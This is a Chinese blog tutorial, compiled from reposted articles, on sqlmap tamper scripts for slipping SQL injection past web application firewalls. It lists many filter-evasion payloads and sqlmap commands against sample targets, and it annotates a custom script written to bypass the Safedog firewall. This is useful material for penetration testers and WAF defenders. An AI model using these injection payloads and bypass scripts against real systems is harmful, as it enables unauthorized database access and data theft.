sqlmap脚本tamper使用

2023-11-17

很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。

sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。

当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。

所以有的时候我们会发现,注入成功了但是dump不出数据,很可能是select被过滤了等等原因。

如何判断使用哪个脚本

最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。

如图:

直接加个单引号被过滤,说明注入时单引号是没法用的。

sqlmap的tamper绕过waf

空格、等于号都没有过滤,成功报错。

sqlmap的tamper绕过waf

select被过滤。

sqlmap的tamper绕过waf以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤。

比如空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等。

下面对于sqlmap的tamper参数详细讲解。

使用方法

参考:sqlmap用户手册详解【实用版】

根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化。

sqlmap的tamper绕过waf

sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2commet,versionedmorekeywords.py"  -v 3 --dbs

脚本名:apostrophemask.py


作用:用utf8代替引号

1
Example: ( "1 AND '1'='1" ) '1  AND  %EF%BC%871%EF%BC%87=%EF%BC%871'

Tested against: all

脚本名:equaltolike.py


作用:like 代替等号

1
2
3
4
5
Example:
*   Input:  SELECT  FROM  users  WHERE  id=1
*    Output SELECT  FROM  users  WHERE  id  LIKE  1

案例一: http://wooyun.org/bugs/wooyun-2010-087296

案例二: http://wooyun.org/bugs/wooyun-2010-074790

案例三:http://wooyun.org/bugs/wooyun-2010-072489

脚本名:space2dash.py


作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

1
Example: ( '1 AND 9227=9227' '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

Tested against: * MSSQL * SQLite

案例一:http://wooyun.org/bugs/wooyun-2010-062878

脚本名:greatest.py


作用:绕过过滤’>’ ,用GREATEST替换大于号。

1
Example: ( '1 AND A > B' '1 AND GREATEST(A,B+1)=A'  Tested against: * MySQL 4, 5.0  and  5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

脚本名:space2hash.py


作用:空格替换为#号 随机字符串 以及换行符

1
2
3
4
Example:
*   Input: 1  AND  9227=9227
*    Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

  • MySQL Tested against:
  • MySQL 4.0, 5.0

脚本名:apostrophenullencode.py


作用:绕过过滤双引号,替换字符和双引号。

1
Example: tamper( "1 AND '1'='1" ) '1  AND  %00%271%00%27=%00%271'

Tested against:

  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:halfversionedmorekeywords.py


作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

1
2
3
Example:
( "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa" ) "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

Requirement:

  • MySQL < 5.1

Tested against:

  • MySQL 4.0.18, 5.0.22

脚本名:space2morehash.py


作用:空格替换为 #号 以及更多随机字符串 换行符

1
2
3
4
5
Example:
* Input: 1  AND  9227=9227
Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement: * MySQL >= 5.1.13 Tested

against: * MySQL 5.1.41

案例一:91ri一篇文章

脚本名:appendnullbyte.py


作用:在有效负荷结束位置加载零字节字符编码

1
Example: ( '1 AND 1=1' '1 AND 1=1%00'

Requirement:

  • Microsoft Access

脚本名:ifnull2ifisnull.py


作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

1
2
3
Example:
( 'IFNULL(1, 2)' 'IF(ISNULL(1),2,1)'

Requirement:

  • MySQL
  • SQLite (possibly)
  • SAP MaxDB (possibly)

Tested against:

  • MySQL 5.0 and 5.5

脚本名:space2mssqlblank.py(mssql)


作用:空格替换为其它空符号

Example: * Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers

Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005

ASCII table:


案例一: wooyun.org/bugs/wooyun-2010-062878

脚本名:base64encode.py


作用:用base64编码替换 Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

案例一: http://wooyun.org/bugs/wooyun-2010-060071

案例二: http://wooyun.org/bugs/wooyun-2010-021062

案例三: http://wooyun.org/bugs/wooyun-2010-043229

脚本名:space2mssqlhash.py


作用:替换空格

1
Example: ( '1 AND 9227=9227' '1%23%0AAND%23%0A9227=9227'  Requirement: * MSSQL * MySQL

脚本名:modsecurityversioned.py


作用:过滤空格,包含完整的查询版本注释

1
Example: ( '1 AND 2>1--' '1 /*!30874AND 2>1*/--'

Requirement: * MySQL

Tested against:

  • MySQL 5.0

脚本名:space2mysqlblank.py


作用:空格替换其它空白符号(mysql)

1
2
3
4
5
Example:
* Input:  SELECT  id  FROM  users
Output SELECT %0Bid%0BFROM%A0users

Requirement:

  • MySQL

Tested against:

  • MySQL 5.1

案例一:wooyun.org/bugs/wooyun-2010-076735

脚本名:between.py


作用:用between替换大于号(>)

1
Example: ( '1 AND A > B--' '1 AND A NOT BETWEEN 0 AND B--'

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

案例一:wooyun.org/bugs/wooyun-2010-068815

脚本名:space2mysqldash.py


作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

注:之前有个mssql的 这个是mysql的

1
Example: ( '1 AND 9227=9227' '1--%0AAND--%0A9227=9227'

Requirement:

  • MySQL
  • MSSQL

脚本名:multiplespaces.py


作用:围绕SQL关键字添加多个空格

1
Example: ( '1 UNION SELECT foobar' '1 UNION SELECT foobar'

Tested against: all

案例一: wooyun.org/bugs/wooyun-2010-072489

脚本名:space2plus.py


作用:用+替换空格

1
Example: ( 'SELECT id FROM users' 'SELECT+id+FROM+users'  Tested against:  all

脚本名:bluecoat.py


作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

1
Example: ( 'SELECT id FROM users where id = 1' 'SELECT%09id FROM users where id LIKE 1'

Tested against:

  • MySQL 5.1, SGOS

脚本名:nonrecursivereplacement.py


双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

1
Example: ( '1 UNION SELECT 2--' '1 UNIOUNIONN SELESELECTCT 2--'  Tested against:  all

脚本名:space2randomblank.py


作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

1
Example: ( 'SELECT id FROM users' 'SELECT%0Did%0DFROM%0Ausers'

Tested against: all

脚本名:sp_password.py


作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

1
Example: ( '1 AND 9227=9227-- ' '1 AND 9227=9227-- sp\_password'  Requirement: * MSSQL

脚本名:chardoubleencode.py


作用: 双url编码(不处理以编码的)

1
2
3
4
5
Example:
* Input:  SELECT  FIELD  FROM %20TABLE
Output : %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

脚本名:unionalltounion.py


作用:替换UNION ALL SELECT UNION SELECT

Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

Requirement: all

脚本名:charencode.py


作用:url编码

1
2
3
4
5
Example:
*   Input:  SELECT  FIELD  FROM %20TABLE
*    Output : %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:randomcase.py


作用:随机大小写 Example:

  • Input: INSERT
  • Output: InsERt

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:unmagicquotes.py


作用:宽字符绕过 GPC addslashes

1
2
3
4
5
Example:
* Input: 1′  AND  1=1
Output : 1%bf%27  AND  1=1–%20

脚本名:randomcomments.py


作用:用/**/分割sql关键字

1
2
3
Example:
INSERT ’ becomes ‘ IN //S//ERT’

脚本名:charunicodeencode.py


作用:字符串 unicode 编码

1
2
3
4
5
Example:
* Input:  SELECT  FIELD%20FROM  TABLE
Output : %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

  • ASP
  • ASP.NET

Tested against:

  • Microsoft SQL Server 2000
  • Microsoft SQL Server 2005
  • MySQL 5.1.56
  • PostgreSQL 9.0.3

案例一: wooyun.org/bugs/wooyun-2010-074261

脚本名:securesphere.py


作用:追加特制的字符串

1
Example: ( '1 AND 1=1' "1 AND 1=1 and '0having'='0having'"

Tested against: all

脚本名:versionedmorekeywords.py


作用:注释绕过

1
2
3
4
5
Example:
* Input: 1  UNION  ALL  SELECT  NULL NULL , CONCAT( CHAR (58,122,114,115,58),IFNULL( CAST ( CURRENT_USER ()  AS  CHAR ), CHAR (32)), CHAR (58,115,114,121,58))#
Output : 1/*! UNION **! ALL **! SELECT **! NULL */,/*! NULL */,/*!CONCAT*/(/*! CHAR */(58,122,114,115,58),/*!IFNULL*/( CAST (/*! CURRENT_USER */()/*! AS **! CHAR */),/*! CHAR */(32)),/*! CHAR */(58,115,114,121,58))#

Requirement:

  • MySQL >= 5.1.13

脚本名:space2comment.py


作用:Replaces space character (‘ ‘) with comments ‘/**/’

1
2
3
4
5
Example:
* Input:  SELECT  id  FROM  users
Output SELECT //id// FROM /**/users

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

案例一:wooyun.org/bugs/wooyun-2010-046496

脚本名:halfversionedmorekeywords.py


作用:关键字前加注释

1
2
3
4
5
Example:
* Input: value’  UNION  ALL  SELECT  CONCAT( CHAR (58,107,112,113,58),IFNULL( CAST ( CURRENT_USER ()  AS  CHAR ), CHAR (32)), CHAR (58,97,110,121,58)),  NULL NULL AND ‘QDWa’= 'QDWa
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=' QDWa

Requirement:

  • MySQL < 5.1

Tested against:

  • MySQL 4.0.18, 5.0.22


转自:http://blog.csdn.net/qq_29277155/article/details/52266478

x00 前言

        sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。本文重点研究sqlmap的软件具体的目录结构,后续的文章也会从源码编写中,阐述sqlmap的种种编码结果。本文从结构中,可以看到sqlmap中的软件工程之美,同时从严谨的软件结构目录分类和构造中,看到sqlmap中的软件开发过程中的庞大但简洁的结构之美。

0x01 tamper脚本

   当我们下载了【sqlmap】的安装包,解压后到文件夹【sqlmap】,在以下路径,我们可以找到文件夹【tamper】,其中该文件夹有44个脚本分别对44种WAF进行检测。例如360,绿盟WAF,modsecurity.,百度,fortiweb,cloudflare。由此可见老外对国内的WAF也是有了解的,可见他们也会悄悄对国内的WAF进行绕过。

0x02 分析tamper脚本

由于【tamper】文件夹中有众多的tamper脚本,限于篇幅,无法一一分析,故选取其中一个脚本【lowercase.py】作为样本分析

#!/usr/bin/env python    #此处用法为:程序到env设置里查找python的安装路径,再调用对应路径下的解释器程序完成操作。这是非常好的做法
"""    #python2.7的多行注释符,此处为三个双引号,因为是其中也有单引号,并且该说明为一般文档说明,故用三个双引号
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
""" #python的多行注释符,此处为三个双引号,因为是其中也有单引号,并且该说明为一般文档说明,故用三个双引号
import re    #导入python中的re 字符替换包,方便下面的字符替换
from lib.core.data import kb   #导入sqlmap中lib\core\data中的kb函数,测试 SQL 注入的过程中,使用的配置文件事先全部被加载到了 conf 和 kb
from lib.core.enums import PRIORITY        #导入sqlmap中lib\core\enums中的PRIORITY函数, LOWEST = -100,LOWER = -50,. 详细见enums.py
__priority__ = PRIORITY.NORMAL            #定义优先级,此处为级别为【一般】
def dependencies(): #定义dependencies():此处是为了和整体脚本的结构保持一致。
    pass #pass 不做任何事情,一般用做占位语句。为了保持程序结构的完整性。
def tamper(payload, **kwargs):     #定义tamper脚本,payload, **kwargs 为定义的参数,其中**kwargs为字典存储,类似于 {'a': 1, 'c': 3, 'b': 2} 
    """         #python的多行注释符,此处为三个双引号,因为是其中也有单引号,并且该说明为一般文档说明,故用三个双引号
    Replaces each keyword character with lower case value     #此处为tamper说明 ,以便使用该脚本。在本例中,该脚本可以
    Tested against:                                                                            #用于多种数据库。并且作用于弱防护效果的防火墙
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases
    >>> tamper('INSERT')
    'insert'
    """ #python的多行注释符,此处为三个双引号,因为是其中也有单引号,并且该说明为一般文档说明,故用三个双引号        
    retVal = payload                                                        # 将payload赋值给  retVal ,以便中间转换。
    if payload:                                                                 # 进行判断payload
        for match in re.finditer(r"[A-Za-z_]+", retVal):        # 对 retVal 【payload】进行小写查找
            word = match.group()                                        #将查找到的字母赋值给word
            if word.upper() in kb.keywords:                          #如果在攻击载荷中有大写字母
                retVal = retVal.replace(word, word.lower())    #将大写字母转换成小写字母。
    return retVal                                                               #返回小写字母

到这里,我们可以看出,该脚本实现了将攻击载荷中大写字母转成了小写字母


0x03 编写一个tamper脚本

         在这里,我们尝试写一个绕过安全狗的tamper脚本,毕竟安全狗在服务器安全领域还是挺不错的,竟然还是免费的,在linux和windows上有各种版本,并且一直维护更新中。

#!/usr/bin/env python                                                                        #此处代码可以直接从其他tamper复制粘贴过来

"""

Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)   #常规文档说明     

See the file 'doc/COPYING' for copying permission

v0.0.1                                                                                               #添加这个脚本的版本说明

2016.08.21                                                                                        #添加我们写这个脚本的日期

"""

from lib.core.enums import PRIORITY    #导入sqlmap中lib\core\enums中的PRIORITY函数, LOWEST = -100,LOWER = -50,. 详细见enums.py

__priority__ = PRIORITY.LOW               #定义优先级,此处为级别为【一般】


def dependencies():                              #定义dependencies():此处是为了和整体脚本的结构保持一致。
    pass                                               #pass 不做任何事情,一般用做占位语句。为了保持程序结构的完整性

def tamper(payload, **kwargs):      #定义tamper脚本,**kwargs 为字典存储,类似于 {'a': 1, 'c': 3} 

    """

   To bypass safedog                         

    Replaces space character (' ') with plus ('/*|%20--%20|*/')          #把空格替换为(/*|%20--%20|*/)绕过,此处为绕过规则
    >>> tamper('SELECT id FROM users')                                   #此处为替换后的具体执行形式
    'SELECT/*|%20--%20|*/id/*|%20--%20|*/FROM/*|%20--%20|*/users'
    """
    retVal = payload                                                                     # 将payload赋值给  retVal ,以便中间转换。
    if payload:                                                                               
        retVal = ""
        quote, doublequote, firstspace = False, False, False             #定义这些符号参数,防止对后面的替换造成影响
        for i in xrange(len(payload)):                                               # 在攻击载荷中逐个进行判断操作。
            if not firstspace:                                                                #如果攻击载荷的第一个字段是空格,则进行替换
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/*|%20--%20|*/"                                      #把空格( ) 替换成(/*|%20--%20|*/)
                    continue                                                                     #继续进行判断操作
            elif payload[i] == '\'':                                                         #如果攻击载荷中有(\ ),则进行编码转换
                quote = not quote
            elif payload[i] == '"':                                                          #如果攻击载荷中有(“ ),则进行编码转换
                doublequote = not doublequote
            elif payload[i] == " " and not doublequote and not quote:         #如果攻击载荷中有空格(),并且它既不是doublequote 或 quote  
                retVal += "/*|%20--%20|*/"                                                    #则进行编码转换
                continue                                                                            继续执行
            retVal += payload[i]                                                            #得到重新组合的payload
    return retVal


# 该脚本可以在github中找到:https://github.com/ym2011/penetration/tree/master/scripts


0x04 参考资料

http://sqlmap.org/

https://github.com/sqlmapproject/sqlmap/

https://github.com/sqlmapproject/sqlmap/wiki

https://github.com/sqlmapproject/sqlmap/wiki/FAQ

https://github.com/sqlmapproject/sqlmap/wiki/Third-party-libraries



转自:http://www.freebuf.com/articles/1000.html

WAF(web应用防火墙)逐渐成为安全解决方案的标配之一。正因为有了它,许多公司甚至已经不在意web应用的漏洞。遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMap绕过WAFs/IDSs。

svn下载最新版本的sqlmap
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

我们关注的重点在于使用tamper脚本修改请求从而逃避WAF的规则检测。许多时候,你需要联合使用多个tamper脚本。
所有tamper脚本请参考:https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/

在这里,我们以针对Mysql的space2hash.pyspace2morehash.py为例。这两个脚本将会自动转换所有空格为随机注释,而此脚本的拓展版本(space2morehash.py)也会帮助到你来“打乱”方法函数以绕过WAF的检测。

Example: * Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

好了,接下来我们讲重点了。

你可以使用命令–tamper 来调用脚本,如下:

./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

由上图我们可以看到,请求中的空格被替换为URL编码后的%23randomText%0A
而CHAR(), USER(),CONCAT() 这种函数被替换为FUNCTION%23randomText%0A()

还有两个空格替换脚本:space2mssqlblank.py and space2mysqlblank.py,如下图

charencode.py andchardoubleencode.py是两个用来打乱编码的tamper脚本,他们在绕过不同的关键词过滤时很有作用。

如果web应用使用asp/asp.net开发,charunicodeencode.pypercentage.py可以帮助你逃避Waf的检测。

有意思的是,asp允许在字符之间使用多个%号间隔,比如 AND 1=%%%%%%%%1 是合法的!

总结:

以上列举了一部分有代表性的tamper脚本来帮助我们绕过waf,每个脚本都有自己的使用场景,还是需要灵活使用。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

sqlmap脚本tamper使用 的相关文章

  • SQL中的DQL(数据查询)语言

    SQL语句分类 通常分为五类 DDL 数据定义语言 create alter drop等 DQL 数据查询语言 select等 DML 数据操纵语言 insert delete update等 TCL 事务操纵语言 commit rollb
  • 我的创作纪念日---Look back on the past year of hard work

    哈 今天在CSDN的站内信收到了通知 为了纪念我在CSDN度过的日日夜夜 故简单写点东西记录一下 分享给可能和我有相同经历的计算机专业的大学生 以此来勉励大家 缘起 嗨 大家好 我是一个内向的计算机小白 在 CSDN 已经度过了 100 多

随机推荐

  • IJKPlayer 编译及运行Demo 教程(详细)

    IJKPlayer 编译及运行Demo 教程 编译环境准备 1 Ubuntu安装 2 工具安装 安装JDK SDK NDK 1 安装JDK 2 安装SDK 3 安装NDK 下载ijkplayer及修改其中配置 编译 android stud
  • [培训-DSP快速入门-8]:C54x DSP汇编语言之寻址方式

    作者主页 文火冰糖的硅基工坊 https blog csdn net HiWangWenBing 本文网址 https blog csdn net HiWangWenBing article details 119023151 目录 第1章
  • Java Timer定时器schedule()函数

    TimerTask task new TimerTask Override public void run 逻辑处理 Timer timer new Timer timer schedule task 0 此处delay为0表示没有延迟 立
  • rosprofiler 安装和使用

    rosprofiler wiki 页面 http wiki ros org rosprofiler rosprofiler package 下载rosprofiler和ros statistics msgs 放到工程目录下编译 https
  • Android列表组件ListView子项的点击事件与子项中组件的点击事件

    点击ListView子项时进行相关的逻辑操作 为ListView组件添加子项点击事件 设置ListView子项的点击事件 testLv setOnItemClickListener new AdapterView OnItemClickLi
  • React 组件根据数据动态渲染

    数据驱动的UI界面 import React from react import as componentLib from components index import dataMap from data dataMap function
  • Error: Cannot find module ‘timers/promises‘

    这个错误很要命 他会导致你本机所有的npm 命令全部报错 首先 这个错误是因为 npm 与 node版本不匹配导致的 最简单的办法就是 查一下你安装的这个npm 的版本适配那个版本的 node 然后将本地的node删除 控制面板写在node
  • 月满中秋夜|中秋和 Jina AI 一起过

    Jina AI 祝您中秋快乐 用开源社区的方式打开别样中秋节 Jina AI 社区准备了两个小任务和精美周边礼物 等你来挑战 活动时间 即日起 9 13号中午12 00 参与方式 Step 1 到 Jina 全家桶的 GitHub 页面 给
  • 使用虚拟机VMware Workstation安装ubuntu22.04

    下载准备 VMwareWorkstation 地址 Download VMware Workstation Pro 我是在windows系统安装 所以选择这个下载按钮 试用版可以在网上找到对应版本的密钥进行破解 一般都不影响使用 iso镜像
  • Warning: Ignoring WAYLAND_DISPLAY on Gnome. Use QT_QPA_PLATFORM=wayland to run on Wayland anyway.Ca

    一 问题描述 centos stream9 安装了多个 qt creator 版本 Qt5 14 1 qt creator 9 0 qt creator 6 0 在调试platforminputcontexts 解决中文无法输入时 在修改
  • 奇迹暖暖服务器不稳定,奇迹暖暖怎么换服务器

    剑雨江湖6月15日服务器互通公告 合服充值大返利 剑雨江湖 6月15日将进行部分服务器互通操作 为了避免不必要的损失 玩家请关注官方公告 详细的 剑雨江湖 15日服务器互通公告 一起来看 服务器级战争爆发 热血三国2 染血战斗檄文呈上 热血
  • lwip接收文件 stm32_LWIP移植文件介绍

    在介绍文件之前首先介绍一下DMA描述符 stm32以太网模块接收 发送FIFO和内存之间的以太网传输是通过以太网DMA使用DMA描述符完成的 一共有两个描述符列表 一个用于接收 一个用于发送 两个列表的基址分别写入ETH DMARDLAR
  • iOS16新特性及开发适配

    一 新特性 iOS 16 满载全新的个性化功能 更具深度的智能技术 以及更多无缝的沟通与共享方式 让 iPhone 的体验更进一步 详细的系统新特性请查看 Apple 发布iOS16预览 中文版 二 开发者适配 IDE环境相关升级 Xcod
  • java: 无法从静态上下文中引用非静态 方法

    Java中静态上下文中无法引用非静态变量的解决办法 一 为什么不能引用 今天编写代码遇到 non static variable mainframe cannot be referenced from a static context 经过
  • 如何将多张图片合成mp4视频格式,并加入背景音乐...

    阅读全文 实现的思路 将准备好的图片通过opencv读取出来 并将其设置好帧数等参数后合成为无声视频 最后通过moviepy编辑视频将背景音乐加入到视频中 开始之前还是需要说明一下非标准库的来源 因为有些库的名称和需要导入模块的名称不一定就
  • 模型部署到移动端_使用 TFLite 在移动设备上优化与部署风格转化模型

    以下文章来源于TensorFlow 作者Google 风格转化 Style Transfer 是一种优化技术 用于采集两张图像 一张内容图像 如建筑物 一张风格图像 如著名画家的作品 并将其融合交织在一起 使输出图像看起来就像是以参考风格图
  • 7-1 厘米换算英尺英寸 (15分)

    7 1 厘米换算英尺英寸 15分 如果已知英制长度的英尺foot和英寸inch的值 那么对应的米是 foot inch 12 0 3048 现在 如果用户输入的是厘米数 那么对应英制长度的英尺和英寸是多少呢 别忘了1英尺等于12英寸 输入格
  • python科学计算——数据可视化(Matplotlib)

    写在前面 Matplotlib提供了大量实现数据可视化功能的模块 采用面向对象进行封装 在编写大型应用时通过面向对象方式将更加有效 这里只是对matplotlib的一些简单功能进行总结 需要更高级别的应用时 请多参考官方说明 pyplot绘
  • 卷积层与批归一化层的参数量计算公式

    卷积层 公式 卷积核的参数量 1 x 输出的特征层数 即该层的卷积核个数 其中的1 表示偏置项 每个卷积核默认附加一个偏置项 批归一化层 公式 4 x 输入的特征层数 其中4表示四个参数值 每个特征图对应一组四个元素的参数组合 beta i
  • sqlmap脚本tamper使用

    很多时候还是得静下来分析过滤系统到底过滤了哪些参数 该如何绕过 sqlmap中的tamper给我们带来了很多防过滤的脚本 非常实用 可能有的朋友还不知道怎样才能最有效的利用tamper脚本 当然使用脚本之前需要确定的就是系统过滤了哪些关键字